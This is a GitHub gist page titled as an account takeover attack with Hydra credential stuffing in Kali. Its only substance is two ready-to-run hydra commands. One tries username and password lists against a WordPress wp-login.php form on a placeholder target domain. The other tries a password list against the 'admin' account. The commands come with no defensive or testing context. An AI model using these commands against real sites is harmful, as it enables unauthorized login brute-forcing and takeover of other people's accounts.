Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
An Account Takeover Attack Using Hydra's Credential Stuffing In Kali (Terminal Command 1)
hydra -L usernames.txt -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
OR
hydra -l admin -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment